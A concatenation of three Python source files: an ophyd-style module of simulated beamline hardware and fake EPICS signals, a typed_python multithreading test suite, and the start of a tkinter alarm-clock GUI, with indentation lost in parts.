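    flyer = MockFlyer('flyer', det, motor, -1, 1, 5)
    flyer.kickoff().wait()
    flyer.complete().wait()  # blocks until the worker thread has stepped through
    return list(flyer.collect())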
class SynSignalWithRegistry(SynSignal):
"""
A SynSignal integrated with databroker.assets
Parameters
----------
func : callable, optional
This function sets the signal to a new value when it is triggered.
Expected signature: ``f() -> value``.
By default, triggering the signal does not change the value.
name : string, keyword only
exposure_time : number, optional
Seconds of delay when triggered (simulated 'exposure time'). Default is
0.
parent : Device, optional
Used internally if this Signal is made part of a larger Device.
reg : Registry, optional
DEPRECATED. If used, this is ignored and a warning is issued. In a
future release, this parameter will be removed.
save_path : str, optional
Path to save files to, if None make a temp dir, defaults to None.
save_func : function, optional
The function to save the data, function signature must be:
`func(file_path, array)`, defaults to np.save
save_spec : str, optional
The spec for the save function, defaults to 'RWFS_NPY'
save_ext : str, optional
The extension to add to the file name, defaults to '.npy'
"""
def __init__(self, *args, save_path=None,
save_func=partial(np.save, allow_pickle=False),
save_spec='NPY_SEQ', save_ext='npy', **kwargs):
super().__init__(*args, **kwargs)
self.save_func = save_func
self.save_ext = save_ext
self._resource_uid = None
self._datum_counter = None
self._asset_docs_cache = deque()
if save_path is None:
self.save_path = mkdtemp()
else:
self.save_path = save_path
self._spec = save_spec # spec name stored in resource doc
self._file_stem = None
self._path_stem = None
self._result = {}
def stage(self):
self._file_stem = short_uid()
self._datum_counter = itertools.count()
self._path_stem = os.path.join(self.save_path, self._file_stem)
# This is temporarily more complicated than it will be in the future.
# It needs to support old configurations that have a registry.
resource = {'spec': self._spec,
'root': self.save_path,
'resource_path': self._file_stem,
'resource_kwargs': {},
'path_semantics': {'posix': 'posix', 'nt': 'windows'}[os.name]}
self._resource_uid = new_uid()
resource['uid'] = self._resource_uid
self._asset_docs_cache.append(('resource', resource))
def trigger(self):
super().trigger()
# save file stash file name
self._result.clear()
for idx, (name, reading) in enumerate(super().read().items()):
# Save the actual reading['value'] to disk. For a real detector,
# this part would be done by the detector IOC, not by ophyd.
data_counter = next(self._datum_counter)
self.save_func('{}_{}.{}'.format(self._path_stem, data_counter,
self.save_ext), reading['value'])
# This is temporarily more complicated than it will be in the
# future. It needs to support old configurations that have a
# registry.
datum = {'resource': self._resource_uid,
'datum_kwargs': dict(index=data_counter)}
# If a Registry is not set, we need to generate the datum_id.
datum_id = '{}/{}'.format(self._resource_uid,
data_counter)
datum['datum_id'] = datum_id
self._asset_docs_cache.append(('datum', datum))
# And now change the reading in place, replacing the value with
# a reference to Registry.
reading['value'] = datum_id
self._result[name] = reading
return NullStatus()
def read(self):
return self._result
def describe(self):
res = super().describe()
for key in res:
res[key]['external'] = "FILESTORE"
return res
def collect_asset_docs(self):
items = list(self._asset_docs_cache)
self._asset_docs_cache.clear()
for item in items:
yield item
def unstage(self):
self._resource_uid = None
self._datum_counter = None
self._asset_docs_cache.clear()
self._file_stem = None
self._path_stem = None
self._result.clear()
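# A brief hedged sketch of the file-writing detector workflow: stage()
# registers a Resource document, trigger() writes the array to disk and caches
# Datum documents, and collect_asset_docs() drains that cache.
def _registry_signal_example():
    img = SynSignalWithRegistry(func=lambda: np.ones((5, 5)), name='img')
    img.stage()
    img.trigger()
    docs = list(img.collect_asset_docs())  # [('resource', ...), ('datum', ...)]
    reading = img.read()                   # values are datum_ids, not arrays
    img.unstage()
    return docs, reading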
class NumpySeqHandler:
specs = {'NPY_SEQ'}
def __init__(self, filename, root=''):
self._name = os.path.join(root, filename)
def __call__(self, index):
return np.load('{}_{}.npy'.format(self._name, index),
allow_pickle=False)
def get_file_list(self, datum_kwarg_gen):
"This method is optional. It is not needed for access, but for export."
return ['{name}_{index}.npy'.format(name=self._name, **kwargs)
for kwargs in datum_kwarg_gen]
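# A brief hedged sketch of how a databroker-style handler resolves the files
# written above: each datum's ``index`` maps to '<root>/<resource_path>_<index>.npy'.
def _numpy_seq_handler_example():
    handler = NumpySeqHandler('stem', root='/tmp')  # illustrative paths only
    # Returns ['/tmp/stem_0.npy', '/tmp/stem_1.npy']; handler(0) would np.load the first.
    return handler.get_file_list([{'index': 0}, {'index': 1}])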
class ABDetector(Device):
a = Cpt(SynSignal, func=random.random, kind=Kind.hinted)
b = Cpt(SynSignal, func=random.random)
def trigger(self):
return self.a.trigger() & self.b.trigger()
class DetWithCountTime(Device):
intensity = Cpt(SynSignal, func=lambda: 0, kind=Kind.hinted)
count_time = Cpt(Signal)
class DetWithConf(Device):
a = Cpt(SynSignal, func=lambda: 1, kind=Kind.hinted)
b = Cpt(SynSignal, func=lambda: 2, kind=Kind.hinted)
c = Cpt(SynSignal, func=lambda: 3)
d = Cpt(SynSignal, func=lambda: 4)
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.read_attrs = ['a', 'b']
self.configuration_attrs = ['c', 'd']
def trigger(self):
return self.a.trigger() & self.b.trigger()
class InvariantSignal(SynSignal):
# Always returns the same reading, including timestamp.
def read(self):
res = super().read()
for k in res:
res[k]['timestamp'] = 0
return res
def __repr__(self):
return "<INVARIANT REPR>"
class SPseudo3x3(PseudoPositioner):
pseudo1 = Cpt(PseudoSingle, limits=(-10, 10), egu='a', kind=Kind.hinted)
pseudo2 = Cpt(PseudoSingle, limits=(-10, 10), egu='b', kind=Kind.hinted)
pseudo3 = Cpt(PseudoSingle, limits=None, egu='c', kind=Kind.hinted)
real1 = Cpt(SoftPositioner, init_pos=0)
real2 = Cpt(SoftPositioner, init_pos=0)
real3 = Cpt(SoftPositioner, init_pos=0)
sig = Cpt(Signal, value=0)
@pseudo_position_argument
def forward(self, pseudo_pos):
pseudo_pos = self.PseudoPosition(*pseudo_pos)
# logger.debug('forward %s', pseudo_pos)
return self.RealPosition(real1=-pseudo_pos.pseudo1,
real2=-pseudo_pos.pseudo2,
real3=-pseudo_pos.pseudo3)
@real_position_argument
def inverse(self, real_pos):
real_pos = self.RealPosition(*real_pos)
# logger.debug('inverse %s', real_pos)
return self.PseudoPosition(pseudo1=-real_pos.real1,
pseudo2=-real_pos.real2,
pseudo3=-real_pos.real3)
class SPseudo1x3(PseudoPositioner):
pseudo1 = Cpt(PseudoSingle, limits=(-10, 10), kind=Kind.hinted)
real1 = Cpt(SoftPositioner, init_pos=0)
real2 = Cpt(SoftPositioner, init_pos=0)
real3 = Cpt(SoftPositioner, init_pos=0)
@pseudo_position_argument
def forward(self, pseudo_pos):
pseudo_pos = self.PseudoPosition(*pseudo_pos)
# logger.debug('forward %s', pseudo_pos)
return self.RealPosition(real1=-pseudo_pos.pseudo1,
real2=-pseudo_pos.pseudo1,
real3=-pseudo_pos.pseudo1)
@real_position_argument
def inverse(self, real_pos):
real_pos = self.RealPosition(*real_pos)
# logger.debug('inverse %s', real_pos)
return self.PseudoPosition(pseudo1=-real_pos.real1)
class SynAxisNoPosition(SynAxis):
@property
def position(self):
raise AttributeError
def make_fake_device(cls):
"""
Inspect cls and construct a fake device that has the same structure.
This works by replacing EpicsSignal with FakeEpicsSignal and EpicsSignalRO
with FakeEpicsSignalRO. The fake class will be a subclass of the real
class.
This assumes that EPICS connections are done entirely in EpicsSignal and
EpicsSignalRO subcomponents. If this is not true, this will fail silently
on class construction and loudly when manipulating an object.
Parameters
----------
cls : Device
A real Device class to inspect and create a fake Device class from
Returns
-------
fake_device : Device
The resulting fake Device class
"""
# Cache to avoid repeating work.
# EpicsSignal and EpicsSignalRO begin in the cache.
if cls not in fake_device_cache:
if not issubclass(cls, Device):
# Ignore non-devices and non-epics-signals
logger.debug('Ignore cls=%s, bases are %s', cls, cls.__bases__)
fake_device_cache[cls] = cls
return cls
fake_dict = {}
# Update all the components recursively
for cpt_name in cls.component_names:
cpt = getattr(cls, cpt_name)
if isinstance(cpt, DDCpt):
# Make a regular Cpt out of the DDC, as it already has
# been generated
fake_cpt = Cpt(cls=cpt.cls, suffix=cpt.suffix,
lazy=cpt.lazy,
trigger_value=cpt.trigger_value,
kind=cpt.kind, add_prefix=cpt.add_prefix,
doc=cpt.doc, **cpt.kwargs,
)
else:
fake_cpt = copy.copy(cpt)
fake_cpt.cls = make_fake_device(cpt.cls)
logger.debug('switch cpt_name=%s to cls=%s', cpt_name,
fake_cpt.cls)
fake_dict[cpt_name] = fake_cpt
fake_class = type('Fake{}'.format(cls.__name__), (cls,), fake_dict)
fake_device_cache[cls] = fake_class
logger.debug('fake_device_cache[%s] = %s', cls, fake_class)
return fake_device_cache[cls]
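# A brief hedged sketch of make_fake_device: a small EpicsSignal-based Device
# is converted into a fake class whose signals can be seeded with sim_put and
# read back without any IOC. The class name and prefix are illustrative only.
def _make_fake_device_example():
    class _Demo(Device):
        sig = Cpt(EpicsSignal, 'VAL')
    FakeDemo = make_fake_device(_Demo)
    dev = FakeDemo('SIM:', name='demo')
    dev.sig.sim_put(3)    # seed a value as a real IOC would
    return dev.sig.get()  # 3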
def clear_fake_device(dev, *, default_value=0, default_string_value='',
ignore_exceptions=False):
'''Clear a fake device by setting all signals to a specific value
Parameters
----------
dev : Device
The fake device
default_value : any, optional
The value to put to non-string components
default_string_value : any, optional
The value to put to components determined to be strings
ignore_exceptions : bool, optional
Ignore any exceptions raised by `sim_put`
Returns
-------
all_values : list
List of all (signal_instance, value) that were set
'''
all_values = []
for walk in dev.walk_signals(include_lazy=True):
sig = walk.item
if not hasattr(sig, 'sim_put'):
continue
try:
string = getattr(sig, 'as_string', False)
value = (default_string_value
if string
else default_value)
sig.sim_put(value)
except Exception:
if not ignore_exceptions:
raise
else:
all_values.append((sig, value))
return all_values
def instantiate_fake_device(dev_cls, *, name=None, prefix='_prefix',
**specified_kw):
'''Instantiate a fake device, optionally specifying some initializer kwargs
If unspecified, all initializer keyword arguments will default to the
string f"_{argument_name}_".
Parameters
----------
dev_cls : class
The device class to instantiate. This is allowed to be a regular
device, as `make_fake_device` will be called on it first.
name : str, optional
The instantiated device name
prefix : str, optional
The instantiated device prefix
**specified_kw :
Keyword arguments to override with a specific value
Returns
-------
dev : dev_cls instance
The instantiated fake device
'''
dev_cls = make_fake_device(dev_cls)
sig = inspect.signature(dev_cls)
ignore_kw = {'kind', 'read_attrs', 'configuration_attrs', 'parent',
'args', 'name', 'prefix'}
def get_kwarg(name, param):
default = param.default
if default == param.empty:
# NOTE: could check param.annotation here
default = '_{}_'.format(param.name)
return specified_kw.get(name, default)
kwargs = {name: get_kwarg(name, param)
for name, param in sig.parameters.items()
if param.kind != param.VAR_KEYWORD and
name not in ignore_kw
}
kwargs['name'] = (name if name is not None else dev_cls.__name__)
kwargs['prefix'] = prefix
return dev_cls(**kwargs)
class FakeEpicsSignal(SynSignal):
"""
Fake version of EpicsSignal that's really just a SynSignal.
    Whereas SynSignal is generally used to test plans, FakeEpicsSignal is
generally used in conjunction with make_fake_device to test any logic
inside of a Device subclass.
Unlike in SynSignal, this class is generally instantiated inside of a
subcomponent generated automatically by make_fake_device. This means we
need extra hooks for modifying the signal's properties after the class
instantiates.
We can emulate EpicsSignal features here. We currently emulate the put
limits and some enum handling.
"""
_metadata_keys = EpicsSignal._metadata_keys
def __init__(self, read_pv, write_pv=None, *, put_complete=False,
string=False, limits=False, auto_monitor=False, name=None,
**kwargs):
"""
Mimic EpicsSignal signature
"""
self.as_string = string
self._enum_strs = None
super().__init__(name=name, **kwargs)
self._use_limits = limits
self._put_func = None
self._limits = None
self._metadata.update(
connected=True,
)
def describe(self):
desc = super().describe()
if self._enum_strs is not None:
desc[self.name]['enum_strs'] = self.enum_strs
return desc
def sim_set_putter(self, putter):
"""
        Define arbitrary behavior on signal put.
This can be used to emulate basic IOC behavior.
"""
self._put_func = putter
def get(self, *, as_string=None, connection_timeout=1.0, **kwargs):
"""
Implement getting as enum strings
"""
if as_string is None:
as_string = self.as_string
value = super().get()
if as_string:
if self.enum_strs is not None and isinstance(value, int):
return self.enum_strs[value]
elif value is not None:
return str(value)
return value
def put(self, value, *args,
connection_timeout=0.0,
callback=None,
use_complete=None,
timeout=0.0,
wait=True,
**kwargs):
"""
Implement putting as enum strings and put functions
Notes
-----
FakeEpicsSignal varies in subtle ways from the real class.
* put-completion callback will _not_ be called.
* connection_timeout, use_complete, wait, and timeout are ignored.
"""
if self.enum_strs is not None:
if value in self.enum_strs:
value = self.enum_strs.index(value)
elif isinstance(value, str):
err = '{} not in enum strs {}'.format(value, self.enum_strs)
raise ValueError(err)
if self._put_func is not None:
return self._put_func(value, *args, **kwargs)
return super().put(value, *args, **kwargs)
def sim_put(self, *args, **kwargs):
"""
Update the read-only signal's value.
Implement here instead of FakeEpicsSignalRO so you can call it with
every fake signal.
"""
force = kwargs.pop('force', True)
# The following will emit SUB_VALUE:
ret = Signal.put(self, *args, force=force, **kwargs)
# Also, ensure that SUB_META has been emitted:
self._run_subs(sub_type=self.SUB_META, **self._metadata)
return ret
@property
def enum_strs(self):
"""
Simulated enum strings.
Use sim_set_enum_strs during setup to set the enum strs.
"""
return self._enum_strs
def sim_set_enum_strs(self, enums):
"""
Set the enum_strs for a fake device
Parameters
----------
enums: list or tuple of str
The enums will be accessed by array index, e.g. the first item in
enums will be 0, the next will be 1, etc.
"""
self._enum_strs = tuple(enums)
self._metadata['enum_strs'] = tuple(enums)
self._run_subs(sub_type=self.SUB_META, **self._metadata)
@property
def limits(self):
return self._limits
def sim_set_limits(self, limits):
"""
Set the fake signal's limits.
"""
self._limits = limits
def check_value(self, value):
"""
Implement some of the checks from EpicsSignal
"""
super().check_value(value)
if value is None:
raise ValueError('Cannot write None to EPICS PVs')
if self._use_limits and not self.limits[0] <= value <= self.limits[1]:
raise LimitError(f'value={value} not within limits {self.limits}')
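# A brief hedged sketch of the emulation hooks on FakeEpicsSignal:
# sim_set_limits and sim_put stand in for metadata and values that a real IOC
# would normally provide; a regular put() then passes through check_value.
def _fake_epics_signal_example():
    sig = FakeEpicsSignal('SIM:VAL', name='sig', limits=True)
    sig.sim_set_limits((0, 10))
    sig.sim_put(0)   # bypasses check_value (force=True)
    sig.put(7)       # goes through check_value; 7 is within (0, 10)
    return sig.get()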
class FakeEpicsSignalRO(SynSignalRO, FakeEpicsSignal):
"""
Read-only FakeEpicsSignal
"""
_metadata_keys = EpicsSignalRO._metadata_keys
class FakeEpicsSignalWithRBV(FakeEpicsSignal):
"""
FakeEpicsSignal with PV and PV_RBV; used in the AreaDetector PV naming
scheme
"""
_metadata_keys = EpicsSignalWithRBV._metadata_keys
def __init__(self, prefix, **kwargs):
super().__init__(prefix + '_RBV', write_pv=prefix, **kwargs)
fake_device_cache = {EpicsSignal: FakeEpicsSignal,
EpicsSignalRO: FakeEpicsSignalRO,
EpicsSignalWithRBV: FakeEpicsSignalWithRBV,
}
class DirectImage(Device):
img = Cpt(SynSignal, kind='hinted')
def __init__(self, *args, func=None, **kwargs):
super().__init__(*args, **kwargs)
if func is not None:
self.img.sim_set_func(func)
def trigger(self):
return self.img.trigger()
def hw(save_path=None):
"Build a set of synthetic hardware (hence the abbreviated name, hw)"
motor = SynAxis(name='motor', labels={'motors'})
motor1 = SynAxis(name='motor1', labels={'motors'})
motor2 = SynAxis(name='motor2', labels={'motors'})
motor3 = SynAxis(name='motor3', labels={'motors'})
jittery_motor1 = SynAxis(name='jittery_motor1',
readback_func=lambda x: x + np.random.rand(),
labels={'motors'})
jittery_motor2 = SynAxis(name='jittery_motor2',
readback_func=lambda x: x + np.random.rand(),
labels={'motors'})
noisy_det = SynGauss('noisy_det', motor, 'motor', center=0, Imax=1,
noise='uniform', sigma=1, noise_multiplier=0.1,
labels={'detectors'})
det = SynGauss('det', motor, 'motor', center=0, Imax=1, sigma=1,
labels={'detectors'})
identical_det = SynGauss('det', motor, 'motor', center=0, Imax=1, sigma=1,
labels={'detectors'})
det1 = SynGauss('det1', motor1, 'motor1', center=0, Imax=5, sigma=0.5,
labels={'detectors'})
det2 = SynGauss('det2', motor2, 'motor2', center=1, Imax=2, sigma=2,
labels={'detectors'})
det3 = SynGauss('det3', motor3, 'motor3', center=-1, Imax=2, sigma=1,
labels={'detectors'})
det4 = Syn2DGauss('det4', motor1, 'motor1', motor2, 'motor2',
center=(0, 0), Imax=1, labels={'detectors'})
det5 = Syn2DGauss('det5', jittery_motor1, 'jittery_motor1', jittery_motor2,
'jittery_motor2', center=(0, 0), Imax=1,
labels={'detectors'})
flyer1 = MockFlyer('flyer1', det, motor, 1, 5, 20)
flyer2 = MockFlyer('flyer2', det, motor, 1, 5, 10)
trivial_flyer = TrivialFlyer()
new_trivial_flyer = NewTrivialFlyer()
ab_det = ABDetector(name='det', labels={'detectors'})
# area detector that directly stores image data in Event
direct_img = DirectImage(func=lambda: np.array(np.ones((10, 10))),
name='direct', labels={'detectors'})
direct_img.img.name = 'img'
direct_img_list = DirectImage(func=lambda: [[1] * 10] * 10,
name='direct', labels={'detectors'})
direct_img_list.img.name = 'direct_img_list'
# area detector that stores data in a file
img = SynSignalWithRegistry(func=lambda: np.array(np.ones((10, 10))),
name='img', labels={'detectors'},
save_path=save_path)
invariant1 = InvariantSignal(func=lambda: 0, name='invariant1',
labels={'detectors'})
invariant2 = InvariantSignal(func=lambda: 0, name='invariant2',
labels={'detectors'})
det_with_conf = DetWithConf(name='det', labels={'detectors'})
det_with_count_time = DetWithCountTime(name='det', labels={'detectors'})
rand = SynPeriodicSignal(name='rand', labels={'detectors'})
rand2 = SynPeriodicSignal(name='rand2', labels={'detectors'})
motor_no_pos = SynAxisNoPosition(name='motor', labels={'motors'})
bool_sig = Signal(value=False, name='bool_sig', labels={'detectors'})
motor_empty_hints1 = SynAxisEmptyHints(name='motor1', labels={'motors'})
motor_empty_hints2 = SynAxisEmptyHints(name='motor2', labels={'motors'})
motor_no_hints1 = SynAxisNoHints(name='motor1', labels={'motors'})
motor_no_hints2 = SynAxisNoHints(name='motor2', labels={'motors'})
# Because some of these reference one another we must define them (above)
# before we pack them into a namespace (below).
signal = SynSignal(name='signal')
return SimpleNamespace(
motor=motor,
motor1=motor1,
motor2=motor2,
motor3=motor3,
jittery_motor1=jittery_motor1,
jittery_motor2=jittery_motor2,
noisy_det=noisy_det,
det=det,
identical_det=identical_det,
det1=det1,
det2=det2,
det3=det3,
det4=det4,
det5=det5,
flyer1=flyer1,
flyer2=flyer2,
trivial_flyer=trivial_flyer,
new_trivial_flyer=new_trivial_flyer,
ab_det=ab_det,
direct_img=direct_img,
direct_img_list=direct_img_list,
img=img,
invariant1=invariant1,
invariant2=invariant2,
pseudo3x3=SPseudo3x3(name='pseudo3x3'),
pseudo1x3=SPseudo1x3(name='pseudo1x3'),
sig=Signal(name='sig', value=0),
det_with_conf=det_with_conf,
det_with_count_time=det_with_count_time,
rand=rand,
rand2=rand2,
motor_no_pos=motor_no_pos,
motor_empty_hints1=motor_empty_hints1,
motor_empty_hints2=motor_empty_hints2,
motor_no_hints1=motor_no_hints1,
motor_no_hints2=motor_no_hints2,
bool_sig=bool_sig,
signal=signal,
)
# Dump instances of the example hardware generated by hw() into the global
# namespace for convenience and back-compat.
globals().update(hw().__dict__)
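# A brief hedged sketch of how the synthetic namespace is typically consumed
# in tests: build a fresh, isolated set of devices per test instead of relying
# on the module-level instances dumped above (assumes status objects expose
# ``wait()``).
def _hw_example():
    ns = hw()
    ns.motor.set(1.0).wait()
    ns.det.trigger().wait()
    return ns.det.read()  # the 'det' Gaussian peaks when motor sits at center=0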
|
multithreading_test.py
|
# Copyright 2019 typed_python Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import threading
import time
import unittest
from flaky import flaky
from typed_python import (
Class, Member, Alternative, TupleOf, ListOf, ConstDict, SerializationContext,
Entrypoint, Compiled, localVariableTypesKnownToCompiler
)
import typed_python._types as _types
def thread_apply(f, argtuples):
threads = []
results = {}
def doit(f, ix, *args):
results[ix] = f(*args)
for ix, a in enumerate(argtuples):
threads.append(threading.Thread(target=doit, args=(f, ix) + a))
for t in threads:
t.start()
for t in threads:
t.join()
return [results.get(i) for i in range(len(argtuples))]
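# A brief hedged sketch of thread_apply: the same callable runs once per
# argument tuple, each in its own thread, and the results come back in
# submission order.
def _thread_apply_example():
    return thread_apply(lambda x: x * x, [(1,), (2,), (3,)])  # -> [1, 4, 9]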
class AClass(Class):
x = Member(int)
class TestMultithreading(unittest.TestCase):
@flaky(max_runs=3, min_passes=1)
def test_gil_is_released(self):
@Compiled
def f(x: int):
res = 0.0
for i in range(x):
res += i
return res
ratios = []
for _1 in range(10):
t0 = time.time()
thread_apply(f, [(100000000,)])
t1 = time.time()
thread_apply(f, [(100000000,), (100000001,)])
t2 = time.time()
first = t1 - t0
second = t2 - t1
ratios.append(second/first)
ratios = sorted(ratios)
ratio = ratios[5]
# expect the ratio to be close to 1, but have some error margin, especially on Travis
# where we may be running in a multitenant environment
if os.environ.get('TRAVIS_CI', None):
self.assertTrue(ratio >= .7 and ratio < 1.75, ratio)
else:
self.assertTrue(ratio >= .9 and ratio < 1.1, ratio)
def test_refcounts_of_objects_across_boundary(self):
class Object:
pass
_ = Object()
A = Alternative("A", X={'x': int}, Y={'y': int})
for instance in [
TupleOf(int)((1, 2, 3)),
ListOf(int)((1, 2, 3)),
# Dict(int,int)({1:2,3:4}),
ConstDict(int, int)({1: 2, 3: 4}),
AClass(),
# anObject,
A.X(x=10)
]:
self.refcountsTest(instance)
def refcountsTest(self, instance):
typeOfInstance = type(instance)
@Compiled
def rapidlyIncAndDecref(x: typeOfInstance):
_ = x
for _1 in range(1000000):
_ = x
return x
thread_apply(rapidlyIncAndDecref, [(instance,)] * 10)
self.assertEqual(_types.refcount(instance), 1)
def test_serialize_is_parallel(self):
if os.environ.get('TRAVIS_CI', None):
return
T = ListOf(int)
x = T()
x.resize(1000000)
sc = SerializationContext().withoutCompression()
def f():
for i in range(10):
sc.deserialize(sc.serialize(x, T), T)
ratios = []
for i in range(10):
t0 = time.time()
thread_apply(f, [()])
t1 = time.time()
thread_apply(f, [(), ()])
t2 = time.time()
first = t1 - t0
second = t2 - t1
ratios.append(second/first)
ratios = sorted(ratios)
ratio = ratios[5]
# expect the ratio to be close to 1, but have some error margin
self.assertTrue(ratio >= .8 and ratio < 1.2, ratios)
def test_can_access_locks_in_compiler_with_locks_as_obj(self):
lock = threading.Lock()
recursiveLock = threading.RLock()
@Compiled
def lockFun(l: object):
with l:
return 10
# these methods will hit 'l' using the interpreter
self.assertEqual(lockFun(lock), 10)
self.assertEqual(lockFun(recursiveLock), 10)
self.assertFalse(lock.locked())
def test_can_access_locks_in_compiler_with_typed_locks(self):
lock = threading.Lock()
recursiveLock = threading.RLock()
@Compiled
def lockFun(l: threading.Lock):
with l:
return 10
@Compiled
def recursiveLockFun(l: threading.RLock):
with l:
return 10
# these methods will hit the lock objects directly, bypassing
# the interpreter and using C code.
self.assertEqual(lockFun(lock), 10)
self.assertEqual(recursiveLockFun(recursiveLock), 10)
self.assertFalse(lock.locked())
@flaky(max_runs=3, min_passes=1)
def test_lock_perf(self):
lock = threading.Lock()
recursiveLock = threading.RLock()
aList = ListOf(int)([0])
@Compiled
def lockFun(l: threading.Lock, aList: ListOf(int), count: int):
print("I KNOW THESE AS ", localVariableTypesKnownToCompiler())
for _ in range(count):
with l:
aList[0] += 1
@Compiled
def recursiveLockFun(l: threading.RLock, aList: ListOf(int), count: int):
for _ in range(count):
with l:
aList[0] += 1
t0 = time.time()
lockFun(lock, aList, 1000000)
t1 = time.time()
recursiveLockFun(recursiveLock, aList, 1000000)
t2 = time.time()
        # I get around 0.02 for this, which is about 50 million locks / second when there is no
# contention.
self.assertLess(t1 - t0, .1)
self.assertLess(t2 - t1, .1)
def test_lock_works(self):
lock = threading.Lock()
aList = ListOf(int)([0])
@Entrypoint
def loopWithLock(l, aList, count):
for _ in range(count):
with l:
aList[0] += 1
ct = 1000000
threads = [threading.Thread(target=loopWithLock, args=(lock, aList, ct)) for _ in range(4)]
for t in threads:
t.start()
for t in threads:
t.join()
# this test will fail (badly) if you remove the lock because we won't add up
# to the right amount.
self.assertEqual(ct * 4, aList[0])
@flaky(max_runs=3, min_passes=1)
def test_lock_with_separate_locks_perf(self):
@Entrypoint
def loopWithLock(l, aList, count):
for _ in range(count):
with l:
aList[0] += 1
def timeFor(threadCount, ct):
t0 = time.time()
threads = [threading.Thread(target=loopWithLock, args=(threading.Lock(), ListOf(int)([0]), ct)) for _ in range(threadCount)]
for t in threads:
t.start()
for t in threads:
t.join()
return time.time() - t0
# prime the compiler
timeFor(1, 10)
oneThread = timeFor(1, 1000000)
twoThreads = timeFor(2, 1000000)
# we should see that we don't really change performance, because our test is using separate
# locks for each of the two threads in the second case. I get almost exactly 1.0 for this,
# but on Travis, because we don't get a dedicated box, we can get more than 1. If the lock
# is held as 'object', you'd see 2.0 or higher, so this still verifies that we are
# getting c-level parallelism at this threshold.
self.assertLess(twoThreads / oneThread, 1.65, (oneThread, twoThreads))
|
alarms.py
|
import tkinter as tk
from tkinter import messagebox
from tkinter.font import Font
from time import sleep, strftime
from threading import Thread
try:
from alarm import Alarm
from sql_connector import SqlConnector
except ImportError:
from .alarm import Alarm
from .sql_connector import SqlConnector
class Alarms(tk.Frame):
def __init__(self, parent):
tk.Frame.__init__(self, parent)
self.canvas_frame = tk.Frame(self)
self.canvas_frame.parent = self
self.alarms_canvas = tk.Canvas(self.canvas_frame)
self.alarms_canvas.parent = self.canvas_frame
self.alarms = tk.Frame(self.alarms_canvas)
self.alarms.parent = self.alarms_canvas
self.add_alarm_button = tk.Button(self, text="Add Alarm", command=self.add_alarm)
self.scrollbar = tk.Scrollbar(self.canvas_frame, orient=tk.VERTICAL,
command=self.alarms_canvas.yview)
self.add_alarm_button.pack(side=tk.TOP, fill=tk.X, expand=0)
self.canvas_frame.pack(side=tk.TOP, fill=tk.BOTH, expand=1)
self.alarms_canvas.pack(side=tk.LEFT, fill=tk.BOTH, expand=1)
self.scrollbar.pack(side=tk.RIGHT, fill=tk.Y, expand=0)
        # Create the list of alarm frames; values are populated from the database.
self.db = SqlConnector()
self.alarm_frames = []
self.add_alarms()
self.thread = Thread(target=self.check_time, daemon=True)
self.thread.start()
self.alarms_canvas.bind("<Configure>", self.on_canvas_resize)
def check_time(self):
while True:
if int(strftime("%S")) in [0, 1, 2]:
time = strftime("%I:%M %p")
for alarm in self.alarms_data:
if alarm[1] == time and alarm[2] == "True":
for alarm_obj in self.alarm_frames:
if alarm[0] == alarm_obj.id:
if alarm_obj.alarm_sound is None:
alarm_obj.play_sound()
break
sleep(1)
def add_alarms(self):
self.alarms_data = self.db.collect()
for alarm_frame in self.alarm_frames:
alarm_frame.pack_forget()
self.alarm_frames = []
for row in range(len(self.alarms_data)):
self.alarm_frames.append(Alarm(self.alarms, self.alarms_data[row][0],
self.alarms_data[row][1], "SunMonTueWedThuFriSat",
None, "", self.alarms_data[row][2]))
for alarm_frame in self.alarm_frames:
alarm_frame.pack(side=tk.TOP, fill=tk.X, expand=1)
self.alarms_canvas.create_window(0, 0, anchor='nw', window=self.alarms,
tags="alarms")
self.alarms_canvas.update_idletasks()
self.alarms_canvas.configure(scrollregion=self.alarms_canvas.bbox('all'),
yscrollcommand=self.scrollbar.set)
self.on_canvas_resize()
def remove_alpha(self, var, index, mode):
if str(var) == "PY_VAR0": # new_hr StringVar is edited
current = self.new_hr.get()
self.new_hr.set("".join(x for x in current if x.isdigit()))
current = str(self.new_hr.get())
if str(current) == "":
self.new_hr.set(1)
elif int(current) > 12:
self.new_hr.set(12)
if str(var) == "PY_VAR1": # new_min StringVar is edited
current = self.new_min.get()
self.new_min.set("".join(x for x in current if x.isdigit()))
current = str(self.new_min.get())
if str(current) == "":
self.new_min.set(0)
elif int(current) > 59:
self.new_min.set(59)
def add_alarm(self):
self.add_window = tk.Toplevel(self)
self.new_hr = tk.StringVar()
self.new_min = tk.StringVar()
self.am_pm = tk.StringVar()
self.new_active = tk.StringVar()
self.new_hr.trace_add("write", self.remove_alpha)
self.new_min.trace_add("write", self.remove_alpha)
self.am_pm.set(0)
self.new_active.set(1)
self.add_frame = tk.Frame(self.add_window)
self.spinbox_frame = tk.Frame(self.add_frame)
self.hours_frame = tk.LabelFrame(self.spinbox_frame,
text="Set hour:")
self.hours_select = tk.Spinbox(self.hours_frame, from_=1, to=12,
textvariable=self.new_hr, width=5,
font=Font(family='Helvetica', size=36,
weight='bold'))
self.minutes_frame = tk.LabelFrame(self.spinbox_frame,
text="Set minute:")
self.minutes_select = tk.Spinbox(self.minutes_frame, from_=0, to=59,
textvariable=self.new_min, width=5,
font=Font(family='Helvetica', size=36,
weight='bold'))
self.am_pm_frame = tk.LabelFrame(self.spinbox_frame,
text="Set Am/PM:")
self.set_am = tk.Radiobutton(self.am_pm_frame, text="AM", variable=self.am_pm,
value=0)
self.set_pm = tk.Radiobutton(self.am_pm_frame, text="PM", variable=self.am_pm,
value=1)
self.active_button = tk.Checkbutton(self.add_frame, text="Set Active:", variable=self.new_active)
self.save_button = tk.Button(self.add_window, text="Save", command=self.confirm_add_alarm)
self.cancel_button = tk.Button(self.add_window, text="Cancel", command=self.add_window.destroy)
self.spinbox_frame.pack(side=tk.TOP, fill=tk.BOTH, expand=1)
self.hours_select.pack(side=tk.LEFT, fill=tk.BOTH, expand=1)
self.minutes_select.pack(side=tk.LEFT, fill=tk.BOTH, expand=1)
self.set_am.pack(side=tk.TOP, fill=tk.BOTH, expand=1)
self.set_pm.pack(side=tk.TOP, fill=tk.BOTH, expand=1)
self.hours_frame.pack(side=tk.LEFT, fill=tk.BOTH, expand=1)
